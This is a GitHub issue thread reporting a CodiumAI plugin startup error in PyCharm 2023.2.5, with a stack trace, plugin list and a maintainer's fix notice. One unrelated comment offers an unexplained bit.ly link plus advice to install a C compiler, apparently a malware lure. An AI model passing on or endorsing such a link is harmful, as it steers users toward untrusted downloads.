### ISSUE TITLE
[0.9.6][PYCHARM PY 2023.2.5] com.intellij.diagnostic.PluginException: ai.codium.ui.actions.AddTerminalSelectionAsCont...

### ISSUE THREAD

**Issue by xinit** [Codium-ai/codiumai-jetbrains-release#324]
# User Description
Initial load of PyCharm brings this up every time.

# Stack Trace
```
com.intellij.diagnostic.PluginException: ai.codium.ui.actions.AddTerminalSelectionAsContextAction (ai.codium.ui.actions.AddTerminalSelectionAsContextAction): group with id "Terminal.OutputContextMenu" isn't registered; action will be added to the "Other" group (module=PluginDescriptor(name=Codiumate - Code, test and review with confidence - by CodiumAI, id=codiumai.codiumai, descriptorPath=plugin.xml, path=~\AppData\Roaming\JetBrains\PyCharm2023.2\plugins\codium-ai-plugin, version=0.9.6, package=null, isBundled=false))
	at com.intellij.openapi.actionSystem.impl.ActionManagerImplKt.reportActionError(ActionManagerImpl.kt:1568)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImplKt.access$reportActionError(ActionManagerImpl.kt:1)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImpl.getParentGroup(ActionManagerImpl.kt:763)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImpl.processAddToGroupNode(ActionManagerImpl.kt:702)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImpl.processActionElement(ActionManagerImpl.kt:426)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImpl.registerPluginActions(ActionManagerImpl.kt:272)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImpl.registerActions$intellij_platform_ide_impl(ActionManagerImpl.kt:145)
	at com.intellij.openapi.actionSystem.impl.ActionManagerImpl.<init>(ActionManagerImpl.kt:118)
	at com.jetbrains.rdserver.ui.actionPopupMenu.BackendActionManager.<init>(BackendActionManager.kt:15)
	at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at java.base/jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:77)
	at java.base/jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499)
	at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:480)
	at com.intellij.serviceContainer.ConstructorInjectionKt.instantiateUsingPicoContainer(constructorInjection.kt:63)
	at com.intellij.serviceContainer.ComponentManagerImpl.instantiateClassWithConstructorInjection(ComponentManagerImpl.kt:1011)
	at com.intellij.serviceContainer.ServiceComponentAdapter.createAndInitialize(ServiceComponentAdapter.kt:47)
	at com.intellij.serviceContainer.ServiceComponentAdapter.doCreateInstance(ServiceCompone

<TRIMMED STACKTRACE>

ponentAdapter.createInstance(BaseComponentAdapter.kt:137)
	at com.intellij.serviceContainer.BaseComponentAdapter.access$createInstance(BaseComponentAdapter.kt:21)
	at com.intellij.serviceContainer.BaseComponentAdapter$getInstanceAsync$2.invokeSuspend(BaseComponentAdapter.kt:185)
	at com.intellij.serviceContainer.BaseComponentAdapter$getInstanceAsync$2.invoke(BaseComponentAdapter.kt)
	at com.intellij.serviceContainer.BaseComponentAdapter$getInstanceAsync$2.invoke(BaseComponentAdapter.kt)
	at kotlinx.coroutines.intrinsics.UndispatchedKt.startUndispatchedOrReturn(Undispatched.kt:78)
	at kotlinx.coroutines.BuildersKt__Builders_commonKt.withContext(Builders.common.kt:167)
	at kotlinx.coroutines.BuildersKt.withContext(Unknown Source)
	at com.intellij.serviceContainer.BaseComponentAdapter.getInstanceAsync(BaseComponentAdapter.kt:180)
	at com.intellij.serviceContainer.ComponentManagerImpl.getServiceAsyncIfDefined(ComponentManagerImpl.kt:646)
	at com.intellij.serviceContainer.ComponentManagerImpl.getServiceAsync(ComponentManagerImpl.kt:637)
	at com.intellij.ide.bootstrap.AppServicePreloadingKt$preloadCriticalServices$2$7.invokeSuspend(appServicePreloading.kt:179)
	at com.intellij.ide.bootstrap.AppServicePreloadingKt$preloadCriticalServices$2$7.invoke(appServicePreloading.kt)
	at com.intellij.ide.bootstrap.AppServicePreloadingKt$preloadCriticalServices$2$7.invoke(appServicePreloading.kt)
	at kotlinx.coroutines.intrinsics.UndispatchedKt.startUndispatchedOrReturn(Undispatched.kt:78)
	at kotlinx.coroutines.BuildersKt__Builders_commonKt.withContext(Builders.common.kt:167)
	at kotlinx.coroutines.BuildersKt.withContext(Unknown Source)
	at com.intellij.diagnostic.TracerKt.subtask(tracer.kt:45)
	at com.intellij.diagnostic.TracerKt.subtask$default(tracer.kt:34)
	at com.intellij.ide.bootstrap.AppServicePreloadingKt$preloadCriticalServices$2.invokeSuspend(appServicePreloading.kt:105)
	at kotlin.coroutines.jvm.internal.BaseContinuationImpl.resumeWith(ContinuationImpl.kt:33)
	at kotlinx.coroutines.DispatchedTask.run(DispatchedTask.kt:106)
	at kotlinx.coroutines.scheduling.CoroutineScheduler.runSafely(CoroutineScheduler.kt:584)
	at kotlinx.coroutines.scheduling.CoroutineScheduler$Worker.executeTask(CoroutineScheduler.kt:793)
	at kotlinx.coroutines.scheduling.CoroutineScheduler$Worker.runWorker(CoroutineScheduler.kt:697)
	at kotlinx.coroutines.scheduling.CoroutineScheduler$Worker.run(CoroutineScheduler.kt:684)

```

# Other Information
```
=== About ===
Build version: PyCharm 2023.2.5 Build: #PY-232.10227.11 November 14, 2023
Theme: IntelliJ Light
JRE: 17.0.9+7-b1000.46, JetBrains s.r.o.
JVM: 17.0.9+7-b1000.46, OpenJDK 64-Bit Server VM, JetBrains s.r.o.
Operating System: Windows 10.0 (amd64)

=== Plugins ===
Custom plugins: [Darcula Darker Theme (1.2.0), Trash Panda Theme (2.2.1), Xcode-Dark Theme (1.2.4), Remote File Systems (232.10227.8), Codiumate - Code, test and review with confidence - by CodiumAI (0.9.6), Gruvbox - Theme (0.6.2), Big Data Tools Core (232.10227.8), Monokai Pro Theme (1.10), Big Data File Viewer (232.10072.27), Solarized Theme (3.0.0), Gradianto (5.5)]
Disabled plugins:[Atom OneDark Theme (1.6), Node.js (232.10227.11), JavaScript Debugger (232.10227.11), Angular and AngularJS (232.10227.11), Nightfall Theme (2.0.2), Webpack (232.10227.11), JSONPath (232.10227.11), QML (232.10227.11), Polymer & Web Components (232.10227.11), Docker (232.10227.11), JavaScript Intention Power Pack (232.10227.11), Vite (232.10227.11), Puppet (232.10227.11), Vagrant (232.10227.11), Tailwind CSS (232.10227.11), TSLint (232.10227.11), JavaScript and TypeScript (232.10227.11), Karma (232.10227.11), Hiberbee Theme (2024.2.28.2100), Prettier (232.10227.11), Vue.js (232.10227.11), Next.js Support (232.10227.11), VSCode Theme (1.10.7), Node.js Remote Interpreter (232.10227.11), Styled Components & Styled JSX (232.10227.11), GNU GetText files support (*.po) (232.10227.11), Gherkin (232.10227.11), Dev Containers (232.10227.11)]
```

**Comment by Buqra55** [comment]
I think this will help you.
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by ArtsiomCh** [comment]
Thanks for reporting!
Fixed in 0.9.7
